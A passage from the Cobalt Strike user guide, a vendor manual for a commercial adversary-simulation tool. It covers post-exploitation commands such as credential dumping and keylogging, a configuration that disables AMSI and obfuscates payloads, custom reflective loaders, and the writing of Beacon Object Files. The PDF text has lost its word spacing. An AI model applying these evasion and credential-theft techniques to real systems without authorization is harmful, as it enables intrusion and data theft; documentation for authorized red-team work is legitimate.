specifiedexploitusesoneofthelistedaggressorscriptfunctionsinthetable,for
|
||
example&bpowerpick.
|
||
l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
|
||
l The‘(useahash)’notemeansselectacredentialthatreferencesahash.
|
||
JobTypes
|
||
Command Aggressor Script UI
|
||
chromedump
|
||
dcsync &bdcsync
|
||
elevate &belevate [beacon]->Access->Elevate
|
||
[beacon]->Access->GoldenTicket
|
||
CobaltStrikeUserGuide www.fortra.com page:158
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ControllingProcessInjection
|
||
Command Aggressor Script UI
|
||
hashdump &bhashdump [beacon]->Access->DumpHashes
|
||
keylogger &bkeylogger
|
||
logonpasswords &blogonpasswords [beacon]->Access->RunMimikatz
|
||
[beacon]->Access->MakeToken(usea
|
||
hash)
|
||
mimikatz &bmimikatz
|
||
&bmimikatz_small
|
||
net &bnet [beacon]->Explore->NetView
|
||
portscan &bportscan [beacon]->Explore->PortScan
|
||
powerpick &bpowerpick
|
||
printscreen &bprintscreen
|
||
pth &bpassthehash
|
||
runasadmin &brunasadmin
|
||
[target]->Scan
|
||
screenshot &bscreenshot [beacon]->Explore->Screenshot
|
||
screenwatch &bscreenwatch
|
||
ssh &bssh [target]->Jump->ssh
|
||
ssh-key &bssh_key [target]->Jump->ssh-key
|
||
[target]->Jump->[exploit](useahash)
|
||
Process Injection Explicit
|
||
ThePROCESS_INJECT_EXPLICIThookisusedtodefinetheexplicitprocessinjectiontechnique.
|
||
Thefollowingbeaconcommands,aggressorscriptfunctions,andUIinterfaceslistedinthe
|
||
tablebelowwillcallthehookandtheusercanimplementtheirowntechniqueorusethebuilt-in
|
||
technique.
|
||
Notethefollowing:
|
||
l
|
||
The[ProcessBrowser]interfaceisaccessedby[beacon] -> Explore -> Process List.
|
||
Thereisalsoamultiversionofthisinterfacewhichisaccessedbyselectingmultiple
|
||
sessionsandusingthesameUImenu.WhenintheProcessBrowserusethebuttonsto
|
||
perform additionalcommandsontheselectedprocess.
|
||
CobaltStrikeUserGuide www.fortra.com page:159
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation
|
||
l
|
||
Thechromedump,dcsync,hashdump,keylogger,logonpasswords,mimikatz,net,
|
||
portscan,printscreen,pth,screenshot,screenwatch,ssh,andssh-key commands
|
||
alsohaveafork&runversion.Tousetheexplicitversionrequiresthepidandarchitecture
|
||
arguments.
|
||
l Forthenet and&bnet commandthe‘domain’commandwillnotusethehook.
|
||
JobTypes
|
||
Command Aggressor Script UI
|
||
browserpivot &bbrowserpivot [beacon]->Explore->BrowserPivot
|
||
chromedump
|
||
dcsync &bdcsync
|
||
dllinject &bdllinject
|
||
hashdump &bhashdump
|
||
inject &binject [ProcessBrowser]->Inject
|
||
keylogger &bkeylogger [ProcessBrowser]->LogKeystrokes
|
||
logonpasswords &blogonpasswords
|
||
mimikatz &bmimikatz
|
||
&bmimikatz_small
|
||
net &bnet
|
||
portscan &bportscan
|
||
printscreen &bprintscreen
|
||
psinject &bpsinject
|
||
pth &bpassthehash
|
||
screenshot &bscreenshot [ProcessBrowser]->Screenshot(Yes)
|
||
screenwatch &bscreenwatch [ProcessBrowser]->Screenshot(No)
|
||
shinject &bshinject
|
||
ssh &bssh
|
||
ssh-key &bssh_key
|
||
Controlling Post Exploitation
|
||
CobaltStrikeUserGuide www.fortra.com page:160
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation
|
||
LargerCobaltStrikepost-exploitationfeatures(e.g.,screenshot,keylogger,hashdump,etc.)are
|
||
implementedasWindowsDLLs.Toexecutethesefeatures,CobaltStrikespawnsatemporary
|
||
process,andinjectsthefeatureintoit.Theprocess-injectblockcontrolstheprocessinjection
|
||
step.Thepost-exblockcontrolsthecontentandbehaviorsspecifictoCobaltStrike’spost-
|
||
exploitationfeatures.Withthe4.5releasethesepost-exploitationfeaturesnowsupportexplicit
|
||
injectionintoanexistingprocesswhenusingthe[pid]and[arch]arguments.
|
||
post-ex {
|
||
# control the temporary process we spawn to
|
||
set spawnto_x86 "%windir%\\syswow64\\rundll32.exe";
|
||
set spawnto_x64 "%windir%\\sysnative\\rundll32.exe";
|
||
# change the permissions and content of our post-ex DLLs
|
||
set obfuscate "true";
|
||
# change our post-ex output named pipe names...
|
||
set pipename "evil_####, stuff\\not_##_ev#l";
|
||
# pass key function pointers from Beacon to its child jobs
|
||
set smartinject "true";
|
||
# disable AMSI in powerpick, execute-assembly, and psinject
|
||
set amsi_disable "true";
|
||
# cleanup the post-ex UDRL memory when the post-ex DLL is
|
||
loaded
|
||
set cleanup "true";
|
||
transform-x64 {
|
||
# replace a string in the port scanner dll
|
||
strrepex "PortScanner" "Scanner module is complete"
|
||
"Scan is complete";
|
||
# replace a string in all post exploitation dlls
|
||
strrep "is alive." "is up.";
|
||
}
|
||
transform-x86 {
|
||
# replace a string in the port scanner dll
|
||
strrepex "PortScanner" "Scanner module is complete"
|
||
"Scan is complete";
|
||
# replace a string in all post exploitation dlls
|
||
strrep "is alive." "is up.";
|
||
}
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:161
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/ControllingPostExploitation
|
||
Thespawnto_x86 andspawnto_x64 optionscontrolthedefaulttemporaryprocessBeaconwill
|
||
spawnforitspost-exploitationfeatures.Hereareafewtipsforthesevalues:
|
||
l Alwaysspecifythefullpathtotheprogram youwantBeacontospawn
|
||
l Environmentvariables(e.g.,%windir%)areOKwithinthesepaths.
|
||
l Donotspecify%windir%\system32orc:\windows\system32directly.Alwaysuse
|
||
syswow64(x86)andsysnative(x64).Beaconwilladjustthesevaluestosystem32
|
||
whereit’snecessary.
|
||
l Foranx86spawntovalue,youmustspecifyanx86program.Foranx64spawntovalue,
|
||
youmustspecifyanx64program.
|
||
l Thepathsyouspecify(minustheautomaticsyswow64/sysnativeadjustment)must
|
||
existfrom bothanx64(native)andx86(wow64)viewofthefilesystem.
|
||
Theobfuscate optionscramblesthecontentofthepost-exDLLsandsettlesthepost-ex
|
||
capabilityintomemoryinamoreOPSEC-safeway.It’sverysimilartotheobfuscateanduserwx
|
||
optionsavailableforBeaconviathestageblock.Somelong-runningpost-exDLLswillmaskand
|
||
unmasktheirstringtable,asneeded,whenthisoptionisset.
|
||
Usepipename tochangethenamedpipenamesused,bypost-exDLLs,tosendoutputbackto
|
||
Beacon.Thisoptionacceptsacomma-separatedlistofpipenames.CobaltStrikewillselecta
|
||
randompipenamefromthisoptionwhenitsetsupapost-exploitationjob.Each#inthe
|
||
pipenameisreplacedwithavalidhexcharacteraswell.
|
||
Thesmartinject optiondirectsBeacontoembedkeyfunctionpointers,likeGetProcAddress
|
||
andLoadLibrary,intoitssame-architecturepost-exDLLs.Thisallowspost-exDLLstobootstrap
|
||
themselvesinanewprocesswithoutshellcode-likebehaviorthatisdetectedandmitigatedby
|
||
watchingmemoryaccessestothePEBandkernel32.dll.
|
||
Thethread_hint optionallowsmulti-threadedpost-exDLLstospawnthreadswithaspoofed
|
||
startaddress.Specifythethreadhintas“module!function+0x##”tospecifythestartaddressto
|
||
spoof.Theoptional0x##partisanoffsetaddedtothestartaddress.
|
||
Theamsi_disable optiondirectspowerpick,execute-assembly,andpsinjecttopatchthe
|
||
AmsiScanBufferfunctionbeforeloading.NETorPowerShellcode.ThislimitstheAntimalware
|
||
ScanInterfacevisibilityintothesecapabilities.
|
||
Thecleanup optioncleansupthepost-exUDRLmemorywhenthepost-exDLLisloaded.See
|
||
Post-ex User Defined Reflective DLL Loader on page 163formoreinformationonhowthis
|
||
operateswithacustomizedpost-exUDRL.
|
||
Setthekeylogger optiontoconfigureCobaltStrike'skeystrokelogger.TheGetAsyncKeyState
|
||
option(default)usestheGetAsyncKeyStateAPItoobservekeystrokes.The
|
||
SetWindowsHookExoptionusesSetWindowsHookExtoobservekeystrokes.
|
||
CobaltStrikeUserGuide www.fortra.com page:162
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/Post-exUserDefinedReflectiveDLLLoader
|
||
Thetransform-x86andtransform-x64blockstransformBeacon’sPostExploitationDLLs.
|
||
Theseblockssupporttwocommands:strrepandstrrepex.
|
||
Thestrrep commandreplacesastringwithinallPostExploitationDLLs.Thestrrepex
|
||
commandreplacesastringwithinthespecificPostExploitationDLLs,andithasthefollowing
|
||
syntax:strrepex<post-exname><originalstr><newstr>.Validpost-exnamesare:
|
||
BrowserPivot,ExecuteAssembly,Hashdump,Keylogger,Mimikatz,NetView,PortScanner,
|
||
PowerPick,Screenshot,andSSHAgent.
|
||
Post-ex User Defined Reflective DLL Loader
|
||
CobaltStrike4.9addedsupportforusingcustomerreflectiveloadersforthepost-expayloads.
|
||
ThePost-exUserDefinedReflectiveLoaderexampleispartoftheudrl-vskitintheArsenalKit.
|
||
GottoHelp -> ArsenalanddownloadtheArsenalKit.Yourlicencekeyisrequired.
|
||
APost-exUserDefinedReflectiveLoadercanonlybeappliedtothefollowingpost-exDLLs:
|
||
l browserpivot
|
||
l hashdump
|
||
l invokeassembly
|
||
l keylogger
|
||
l mimikatz
|
||
l netview
|
||
l portscan
|
||
l powershell
|
||
l screenshot
|
||
l sshagent
|
||
Implementation
|
||
ThefollowingAggressorscripthookisprovidedtoallowimplementationofPost-exUser
|
||
DefinedReflectiveLoaders:
|
||
Function Description
|
||
POSTEX_RDLL_GENERATE HookusedtoimplementReflectiveLoaderreplacement
|
||
forpost-exDLLs.ArgumentsprovidedincludeBeaconID,
|
||
GetModuleHandleAaddress,andGetProcAddress
|
||
address.
|
||
CobaltStrikeUserGuide www.fortra.com page:163
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
Using Post-ex User Defined Reflective DLL Loaders
|
||
Create/Compileyour ReflectiveLoaders
|
||
ThePost-exUserDefinedReflectiveLoaderexampleispartoftheudrl-vskitintheArsenalKit.
|
||
GottoHelp -> ArsenalanddownloadtheArsenalKit.Yourlicensekeyisrequired.Pleasenote
|
||
thatUserDefinedReflectiveLoadersforBeaconpayloadsandpost-expayloadsareverysimilar
|
||
buthavesomesubtledifferences.
|
||
TheloaderentryfunctioniscalledwiththeWinAPIcallingconvention,andittakesasingle
|
||
LPVOIDargument.Therefore,theentryfunctionmustbedeclaredasfollows:
|
||
void WINAPI ReflectiveLoader(LPVOID loaderArgument)
|
||
Post-exploitationpayloadsassumethattheDLL'sentrypointiscalledwiththefollowingorder
|
||
andarguments:
|
||
DllMain(<Loaded DLL Base Address>, DLL_PROCESS_ATTACH, <Pointer to
|
||
RDATA_SECTION strucutre>);
|
||
DllMain(<Loader Base Address>, 4, <Loader Argument from the entry
|
||
function>);
|
||
TheRDATA_SECTIONpointargumentisassomelong-runningpost-exploitationpayloads
|
||
obfuscatetheir.rdatasectionduringthewaitingperiod.Itistheloader'sresponsibilitytoprovide
|
||
thefollowingstructuretotheDLL:
|
||
typedef struct {
|
||
char* start; // The start address of the .rdata section
|
||
DWORD length; // The length (Size of Raw Data) of the .rdata section
|
||
DWORD offset; // The obfuscation start offset
|
||
} RDATA_SECTION, *PRDATA_SECTION;
|
||
TheobfuscationstartoffsetensuresthattheImportAddressTable(IAT)willnotbeobfuscated.
|
||
Typically,thisvalueshouldbesettothesizeoftheIMAGE_DIRECTORY_ENTRY_IATData
|
||
Directoryentryasfollows:
|
||
rdata->offset = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_
|
||
ENTRY_IAT].Size;
|
||
User Defined Reflective DLL Loader
|
||
CobaltStrikeUserGuide www.fortra.com page:164
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
CobaltStrike4.4addedsupportforusingcustomizedreflectiveloadersforbeaconpayloads.
|
||
TheUserDefinedReflectiveLoader(UDRL)KitisthesourcecodefortheUDRLexample.Goto
|
||
Help -> ArsenalanddownloadtheUDRLKit.Yourlicencekeyisrequired.
|
||
NOTE:
|
||
Thereflectiveloader'sexecutablecodeistheextracted.textsectionfromauserprovided
|
||
compiledobjectfile.Theextractedexecutablecodemustbelessthan100KB.
|
||
Implementation
|
||
ThefollowingAggressorscripthooksareprovidedtoallowimplementationofUserDefined
|
||
ReflectiveLoaders:
|
||
Function Description
|
||
BEACON_RDLL_GENERATE HookusedtoimplementbasicReflectiveLoader
|
||
replacement.
|
||
BEACON_RDLL_SIZE Thishookiscalledwhenpreparingbeaconsand
|
||
allowstheusertoconfiguremorethan5KBspace
|
||
fortheirreflectiveloader(upto100KB).Thishook
|
||
canalsobeusedtoremovetheentirespacefor
|
||
thereflectiveloader.
|
||
BEACON_RDLL_GENERATE_LOCAL HookusedtoimplementadvancedReflective
|
||
Loaderreplacement.Additionalarguments
|
||
providedincludeBeaconID,GetModuleHandleA
|
||
address,andGetProcAddressaddress.
|
||
ThefollowingAggressorscriptfunctionsareprovidedtoextracttheReflectiveLoader
|
||
executablecode(.textsection)fromacompiledobjectfileandinserttheexecutablecodeinto
|
||
thebeaconpayload:
|
||
Function Description
|
||
extract_reflective_loader ExtractstheReflectiveLoaderexecutablecode
|
||
fromabytearraycontainingacompiledobjectfile.
|
||
setup_reflective_loader InsertstheReflectiveLoaderexecutablecodeinto
|
||
thebeaconpayload.
|
||
ThefollowingAggressorscriptfunctionsareprovidedtomodifythebeaconpayloadusing
|
||
informationfromtheMalleableC2profile:
|
||
CobaltStrikeUserGuide www.fortra.com page:165
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
Function Description
|
||
setup_strings ApplythestringsdefinedintheMalleableC2profile
|
||
tothebeaconpayload.
|
||
setup_transformations Applythetransformationrulesdefinedinthe
|
||
MalleableC2profiletothebeaconpayload.
|
||
ThefollowingAggressorscriptfunctionisprovidedtoobtaininformationaboutthebeacon
|
||
payloadtoassistwithcustommodificationstothepayload:
|
||
Function Description
|
||
pedump Loadsamapofinformationaboutthebeacon
|
||
payload.Thismapinformationissimilartothe
|
||
outputofthe"peclone"commandwiththe"dump"
|
||
argument.
|
||
ThefollowingAggressorscriptfunctionsareprovidedtoperformcustommodificationstothe
|
||
beaconpayload:
|
||
NOTE:
|
||
Dependingonthecustommodificationsmade(obfuscation,mask,etc...),thereflective
|
||
loadermayhavetoreversethosemodificationswhenloading.
|
||
Function Description
|
||
pe_insert_rich_header InsertrichheaderdataintoBeaconDLLContent.If
|
||
thereisexistingrichheaderinformation,itwillbe
|
||
replaced.
|
||
pe_mask MaskdataintheBeaconDLLContentbasedon
|
||
positionandlength.
|
||
pe_mask_section MaskdataintheBeaconDLLContentbasedon
|
||
positionandlength.
|
||
pe_mask_string MaskastringintheBeaconDLLContentbasedon
|
||
position.
|
||
pe_patch_code PatchcodeintheBeaconDLLContentbasedon
|
||
find/replacein'.text'section'.
|
||
pe_remove_rich_header RemovetherichheaderfromBeaconDLL
|
||
Content.
|
||
pe_set_compile_time_with_long SetthecompiletimeintheBeaconDLLContent.
|
||
pe_set_compile_time_with_string SetthecompiletimeintheBeaconDLLContent.
|
||
CobaltStrikeUserGuide www.fortra.com page:166
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
Function Description
|
||
pe_set_export_name SettheexportnameintheBeaconDLLContent.
|
||
pe_set_long Placesalongvalueataspecifiedlocation.
|
||
pe_set_short Placesashortvalueataspecifiedlocation.
|
||
pe_set_string Placesastringvalueataspecifiedlocation.
|
||
pe_set_stringz Placesastringvalueataspecifiedlocationand
|
||
addsazeroterminator.
|
||
pe_set_value_at Setsalongvaluebasedonthelocationresolvedby
|
||
anamefromthePEMap(seepedump).
|
||
pe_stomp Setastringtonullcharacters.Startataspecified
|
||
locationandsetsallcharacterstonulluntilanull
|
||
stringterminatorisreached.
|
||
pe_update_checksum UpdatethechecksumintheBeaconDLLContent.
|
||
Using User Defined Reflective DLL Loaders
|
||
Create/Compileyour ReflectiveLoaders
|
||
TheUserDefinedReflectiveLoader(UDRL)KitisthesourcecodefortheUDRLexample.Goto
|
||
Help -> ArsenalanddownloadtheUDRLKit(yourlicensekeyisrequired).
|
||
ThefollowingistheCobaltStrikeprocessforpreppingbeacons:
|
||
l TheBEACON_RDLL_SIZEhookiscalledwhenpreparingbeacons.
|
||
o Thisgivestheuserachancetoindicatethatmorethan5KBspacewillberequired
|
||
fortheirreflectiveloader.
|
||
o Userscanusebeaconswithspacereservedforareflectiveloaderupto100KB.
|
||
o Whenoverridingavailablereflectiveloaderspaceinthebeacons,thebeaconswill
|
||
bemuchlarger.Infact,theywillbetoolargeforstandardartifactsprovidedby
|
||
CobaltStrike.Userswillneedtoupdatetheirprocesstousecustomizedartifacts
|
||
withlargerreservedspaceforthelargerbeacons.
|
||
o Thiscanbeusedtoremovethereflectiveloaderspacefrom theBeaconDLL.
|
||
CobaltStrikeUserGuide www.fortra.com page:167
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
l Beaconsarepatchedwithrequiredsettingsaspayloaddata.
|
||
o ThefollowingarepatchedintoBeaconsforUDRL:
|
||
n ListenerSettings
|
||
n SomeMalleableC2Settings.
|
||
Usingsleepmaskanduserwxrequiresareflectiveloadercapableofcreating
|
||
memoryforthe.textexecutablecodewithRWXpermissions,orthebeacon
|
||
willcrashwhenmasking/unmaskingwriteprotectedmemory.Thedefault
|
||
reflectiveloadersnormallyhandlethis.
|
||
Usingsleepmaskandobfuscaterequiresareflectiveloadercapableof
|
||
removingthe1st4Kblock(Header)oftheDLLastheheaderwillnotbe
|
||
masked.
|
||
o ThefollowingisNOTpatchedintoBeaconsforUDRL:
|
||
n PEModifications
|
||
l BEACON_RDLL_GENERATEisnormallycalled.BEACON_RDLL_GENERATE_LOCALhook
|
||
iscalledwhen:
|
||
o Thefollowingdetermineswhichiscalled:
|
||
n MalleableC2has“.stage.smartinject”seton.
|
||
o Useextract_reflective_loaderfunctiontoextractthereflectiveloader.
|
||
o Usesetup_reflective_loaderfunctiontopatchtheextractedreflectiveloaderinto
|
||
thereflectiveloaderspaceintheBeacons.
|
||
n Iftheloaderistoobigfortheselectedbeacon,youwillseeamessagelike
|
||
this:
|
||
o ReflectiveDLLContentlength(123456)exceedsavailablespace
|
||
(5120).
|
||
n Use“BEACON_RDLL_SIZE”touseabeaconswithlargerReflectiveLoaders.
|
||
o Thereareadditionalfunctionsavailabletohelpinspectandmakemodificationsto
|
||
theBeaconsbasedontheReflectiveLoaderscapabilities.Forexample:
|
||
n Provideobfuscation
|
||
n Patchinaddressesforsmartinjectsupport
|
||
l Beaconsarepatchedintoartifacts.
|
||
o Beaconsthathavebeenbuiltwiththelargerreflectiveloaderspace(per“BEACON_
|
||
RDLL_SIZE”above)willneedtobeloadedintocustomizedartifactswithspaceto
|
||
holdlargebeacons.
|
||
o GotoHelp -> Arsenalfrom alicensedCobaltStriketodownloadtheArtifactKit.
|
||
o Seethe“stagesize”referencesintheseartifactkitfilesprovidedbyCobaltStrike:
|
||
n See“stagesize”referencesinartifactbuildscript.
|
||
n See“stagesize”referencesin‘script.example’
|
||
CobaltStrikeUserGuide www.fortra.com page:168
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
Beacon User Data
|
||
BeaconUserData(BUD)isaC-structurethatallowsReflectiveLoaderstopassadditionaldata
|
||
toBeacons.Youcandownloadthebeacon_user_data.hfilehere.Inaddition,theudrl-vskitin
|
||
theArsenalKitincludesanexampleBUDloader.
|
||
PassingBeaconUserData
|
||
TheBUDispassedasapointertotheBeaconbycallingBeacon'sDllMainfunctionwitha
|
||
customreasoningknownasDLL_BEACON_USER_DATA(0x0d).TheBUDmustbegivento
|
||
BeaconbeforethestandardDLL_PROCESS_ATTACHreasonisinvoked.
|
||
BeaconcopiesnecessaryvaluesfromtheBUDduringtheDLL_USER_DATAcall,andthereforeit
|
||
isnotrequiredtokeeptheBUDstructureinmemoryafterthecall.
|
||
VersionNumber
|
||
ThefirstvaluecontainedwithintheBUDstructureistheversionnumber.Thisversionnumberis
|
||
essentialinensuringbackwardcompatibilitybetweendifferentversionsofBeaconsand
|
||
ReflectiveLoaderssinceitallowsnewerBeaconstohandleandutilizetheolderBUDstructure
|
||
withoutcrashing.
|
||
Theversionnumberusesthefollowingformat:0xMMmmPP,where:
|
||
l MM=CobaltStrike’smajorversionnumber
|
||
l mm =CobaltStrike’sminorversionnumber
|
||
l PP=CobaltStrike’spatchversionnumber
|
||
Forexample,0x040900translatestoversionCS 4.9.
|
||
System Calls
|
||
BeaconUserDataallowsaReflectiveLoadertoresolveandpasssystemcallinformationto
|
||
Beacon,whichovertakesBeacon'sdefaultsystemcallresolver.SeeSystem Calls on page 41
|
||
tolearnmore.
|
||
BeaconUserDatahasanSYSCALL_API_ENTRYstructureforeachsupportedSystemCall,and
|
||
theSYSCALL_APIstructureholdstheseentries.Theentrycontainsthefollowingvalues
|
||
CobaltStrikeUserGuide www.fortra.com page:169
|
||
|
||
MalleablePE,ProcessInjection,andPostExploitation/UserDefinedReflectiveDLL Loader
|
||
l jmpAddr:TheaddressofthecorrectSystem Callinstructiondependingonsystem
|
||
architecture:
|
||
o x64:thesyscallinstruction
|
||
o WOW64(32-bitonx64):FastSysCallinWOW64
|
||
o Nativex86:KiFastSystemCall
|
||
l sysnum:TheSystem Callnumber
|
||
l fnAddr:TheaddressofthecorrespondingNt*function
|
||
ThejmpAddrandsysnumvaluesarerequiredforindirectSystemCalls,andfnAddrisrequired
|
||
fordirectSystemCalls.Ifthevalueiszero,BeaconfallsbacktothecorrespondingWinAPIcall.
|
||
Theuser-definedSystemCallinformationisskippedifthesyscallsfieldsintheUSER_DATA
|
||
structurepointstoNULL.
|
||
Custom Data
|
||
BeaconUserDataallowsaReflectiveLoadertopassasmall(32bytes)databuffertoBeacon.
|
||
BeaconObjectFiles(BOFs)canretrieveapointertothisdatawiththe
|
||
BeaconGetCustomUserDatafunction.
|
||
CobaltStrikeUserGuide www.fortra.com page:170
|
||
|
||
BeaconObjectFiles/WhataretheadvantagesofBOFs?
|
||
Beacon Object Files
|
||
ABeaconObjectFile(BOF)isacompiledCprogram,writtentoaconventionthatallowsitto
|
||
executewithinaBeaconprocessanduseinternalBeaconAPIs.BOFsareawaytorapidly
|
||
extendtheBeaconagentwithnewpost-exploitationfeatures.
|
||
What are the advantages of BOFs?
|
||
Oneofthekeyrolesofacommand&controlplatformistoprovidewaystouseexternalpost-
|
||
exploitationfunctionality.CobaltStrikealreadyhastoolstousePowerShell,.NET,andReflective
|
||
DLLs.ThesetoolsrelyonanOPSECexpensivefork&runpatternthatinvolvesaprocesscreate
|
||
andinjectionforeachpost-exploitationaction.BOFshavealighterfootprint.Theyruninsideofa
|
||
Beaconprocessandarememorycanbecontrolledusingthemalleablec2profilewithinthe
|
||
process-injectblock.
|
||
BOFsarealsoverysmall.AUACbypassprivilegeescalationReflectiveDLLimplementationmay
|
||
weighinat100KB+.Thesameexploit,builtasaBOF,is<3KB.Thiscanmakeabigdifference
|
||
whenusingbandwidthconstrainedchannels,suchasDNS.
|
||
Finally,BOFsareeasytodevelop.YoujustneedaWin32Ccompilerandacommandline.Both
|
||
MinGWandMicrosoft'sCcompilercanproduceBOFfiles.Youdon'thavetofusswithproject
|
||
settingsthataresometimesmoreeffortthanthecodeitself.
|
||
How do BOFs work?
|
||
ToBeacon,aBOFisjustablockofposition-independentcodethatreceivespointerstosome
|
||
BeaconinternalAPIs.
|
||
ToCobaltStrike,aBOFisanobjectfileproducedbyaCcompiler.CobaltStrikeparsesthisfile
|
||
andactsasalinkerandloaderforitscontents.Thisapproachallowsyoutowriteposition-
|
||
independentcode,foruseinBeacon,withouttediousgymnasticstomanagestringsand
|
||
dynamicallycallWin32APIs.
|
||
What are the disadvantages of BOFs?
|
||
BOFsaresingle-fileCprogramsthatcallWin32APIsandlimitedBeaconAPIs.Don'texpectto
|
||
linkinotherfunctionalityorbuildlargeprojectswiththismechanism.
|
||
CobaltStrikedoesnotlinkyourBOFtoalibc.Thismeansyou'relimitedtocompilerintrinsics
|
||
(e.g.,__stosbonVisualStudioformemset),theexposedBeaconinternalAPIs,Win32APIs,and
|
||
CobaltStrikeUserGuide www.fortra.com page:171
|
||
|
||
BeaconObjectFiles/HowdoIdevelopaBOF?
|
||
thefunctionsthatyouwrite.Expectthatalotofcommonfunctions(e.g.,strlen,stcmp,etc.)are
|
||
notavailabletoyouviaaBOF.
|
||
BOFsexecuteinsideofyourBeaconagent.IfaBOFcrashes,youorafriendyouvaluewilllose
|
||
access.WriteyourBOFscarefully.
|
||
CobaltStrikeexpectsthatyourBOFsaresingle-threadedprogramsthatrunforashortperiodof
|
||
time.BOFswillblockotherBeacontasksandfunctionalityfromexecuting.ThereisnoBOF
|
||
patternforasynchronousorlong-runningtasks.Ifyouwanttobuildalong-runningcapability,
|
||
consideraReflectiveDLLthatrunsinsideofasacrificialprocess.
|
||
How do I develop a BOF?
|
||
OpenyourpreferredtexteditorandstartwritingaCprogram.Here'saHelloWorldBOF:
|
||
#include <windows.h>
|
||
#include "beacon.h"
|
||
void go(char * args, int alen) {
|
||
BeaconPrintf(CALLBACK_OUTPUT, "Hello World: %s", args);
|
||
}
|
||
Downloadbeacon.h.
|
||
TocompilethiswithVisualStudio:
|
||
cl.exe /c /GS- hello.c /Fohello.o
|
||
Tocompilethiswithx86MinGW:
|
||
i686-w64-mingw32-gcc -c hello.c -o hello.o
|
||
Tocompilethiswithx64MinGW:
|
||
x86_64-w64-mingw32-gcc -c hello.c -o hello.o
|
||
Thecommandsaboveproduceahello.ofile.Useinline-executeinBeacontoruntheBOF.
|
||
beacon> inline-execute /path/to/hello.o these are arguments
|
||
beacon.hcontainsdefinitionsforseveralinternalBeaconAPIs.Thefunctiongoissimilarto
|
||
maininanyotherCprogram.It'sthefunctionthat'scalledbyinline-executeandargumentsare
|
||
CobaltStrikeUserGuide www.fortra.com page:172
|
||
|
||
BeaconObjectFiles/DynamicFunctionResolution
|
||
passedtoit.BeaconOutputisaninternalBeaconAPItosendoutputtotheoperator.Notmuch
|
||
toit.
|
||
Dynamic Function Resolution
|
||
GetProcAddress,LoadLibraryA,GetModuleHandle,andFreeLibraryareavailablewithinBOF
|
||
files.YouhavetheoptiontousethesetoresolveWin32APIsyouwishtocall.Anotheroptionis
|
||
touseDynamicFunctionResolution(DFR).
|
||
DynamicFunctionResolutionisaconventiontodeclareandcallWin32APIsas
|
||
LIBRARY$Function.ThisconventionprovidesBeaconwiththeinformationitneedstoexplicitly
|
||
resolvethespecificfunctionandmakeitavailabletoyourBOFfilebeforeitruns.Whenthis
|
||
processfails,CobaltStrikewillrefusetoexecutetheBOFandtellyouwhichfunctionitcouldn't
|
||
resolve.
|
||
Here'sanexampleBOFthatusesDFR andlooksupthecurrentdomain:
|
||
#include <windows.h>
|
||
#include <stdio.h>
|
||
#include <dsgetdc.h>
|
||
#include "beacon.h"
|
||
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID,
|
||
LPVOID,
|
||
ULONG, LPVOID);
|
||
DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID);
|
||
void go(char * args, int alen) {
|
||
DWORD dwRet;
|
||
PDOMAIN_CONTROLLER_INFO pdcInfo;
|
||
dwRet = NETAPI32$DsGetDcNameA(NULL, NULL, NULL, NULL, 0, &pdcInfo);
|
||
if (ERROR_SUCCESS == dwRet) {
|
||
BeaconPrintf(CALLBACK_OUTPUT, "%s", pdcInfo->DomainName);
|
||
}
|
||
NETAPI32$NetApiBufferFree(pdcInfo);
|
||
}
|
||
TheabovecodemakesDFR callstoDsGetDcNameAandNetApiBufferFreefromNETAPI32.
|
||
WhenyoudeclarefunctionprototypesforDynamicFunctionResolution,paycloseattentionto
|
||
thedecoratorsattachedtothefunctiondeclaration.Keywords,suchasWINAPIand
|
||
DECLSPEC_IMPORTareimportant.Thesedecorationsprovidethecompilerwiththeneeded
|
||
hintstopassargumentsandgeneratetherightcallinstruction.
|
||
CobaltStrikeUserGuide www.fortra.com page:173
|
||
|
||
BeaconObjectFiles/AggressorScriptandBOFs
|
||
Aggressor Script and BOFs
|
||
You'lllikelywanttouseAggressorScripttorunyourfinalizedBOFimplementationswithin
|
||
CobaltStrike.ABOFisagoodplacetoimplementalateralmovementtechnique,anescalation
|
||
ofprivilegetool,oranewreconnaissancecapability.
|
||
The&beacon_inline_executefunctionisAggressorScript'sentrypointtorunaBOFfile.Hereisa
|
||
scripttorunasimpleHelloWorldprogram:
|
||
alias hello {
|
||
local('$barch $handle $data $args');
|
||
# figure out the arch of this session
|
||
$barch = barch($1);
|
||
# read in the right BOF file
|
||
$handle = openf(script_resource("hello. $+ $barch $+ .o"));
|
||
$data = readb($handle, -1);
|
||
closef($handle);
|
||
# pack our arguments
|
||
$args = bof_pack($1, "zi", "Hello World", 1234);
|
||
# announce what we're doing
|
||
btask($1, "Running Hello BOF");
|
||
# execute it.
|
||
beacon_inline_execute($1, $data, "demo", $args);
|
||
}
|
||
Thescriptfirstdeterminesthearchitectureofthesession.Anx86BOFwillonlyruninanx86
|
||
Beaconsession.Conversely,anx64BOFwillonlyruninanx64Beaconsession.Thisscriptthen
|
||
readstargetBOFintoanAggressorScriptvariable.Thenextstepistopackourarguments.The
|
||
&bof_packfunctionpacksargumentsinawaythatiscompatiblewithBeacon'sinternaldata
|
||
parserAPI.Thisscriptusesthecustomary&btasktologtheactiontheuseraskedBeaconto
|
||
perform.And,&beacon_inline_executerunstheBOFwithitsarguments.
|
||
The&beacon_inline_executefunctionacceptstheBeaconIDasthefirstargument,astring
